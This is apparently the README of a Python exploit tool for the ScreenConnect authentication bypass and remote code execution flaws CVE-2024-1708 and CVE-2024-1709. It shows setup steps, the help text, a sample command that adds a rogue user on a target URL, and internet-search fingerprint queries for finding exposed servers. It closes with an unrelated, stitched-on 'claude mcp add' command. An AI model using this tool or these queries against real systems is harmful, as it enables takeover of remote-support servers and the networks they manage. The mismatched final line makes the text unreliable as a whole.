I'm using Python3.9
pip install requests
# python check.py
python batchAdduser.py
python ScreenConnect-AuthBypass-RCE.py -h
usage: ScreenConnect-AuthBypass-RCE.py [-h] [-u USERNAME] [-p PASSWORD] -t TARGET [-d DOMAIN] [--proxy PROXY]
CVE-2024-1708 && CVE-2024-1709 --> RCE!!!
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
username you want to add
-p PASSWORD, --password PASSWORD
password you want to add
-t TARGET, --target TARGET
target url
-d DOMAIN, --domain DOMAIN
Description of domain
--proxy PROXY eg: http://127.0.0.1:8080
For example:
python ScreenConnect-AuthBypass-RCE.py -t http://192.168.9.100
When you encounter the following situation, it indicates that the site cannot be RCE through this script.
The specific reasons can be found at:
https://screenconnect.product.connectwise.com/communities/1/topics/1653-whitelist-custom-extensions-in-65
https://bishopfox.com/blog/connectwise-control-advisory
https://www.connectwise.com/globalassets/media/documents/connectwisecontrolsecurityevaluationmatrix.pdf
If you can get a legal signature, please file issues, thank you very much.
services.modules.http.headers.server:"screenconnect"
app:"ScreenConnect Remote Management Software"
services.http.response.headers:(key: `Server` and value.headers: `ScreenConnect`)
"Server: ScreenConnect"
product.name="ConnectWise ScreenConnect software"
app="ScreenConnect-Remote-Support-Software"
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
https://github.com/rapid7/metasploit-framework/pull/18870
$ claude mcp add ScreenConnect-AuthBypass-RCE \
-- python -m otcore.mcp_server <graph>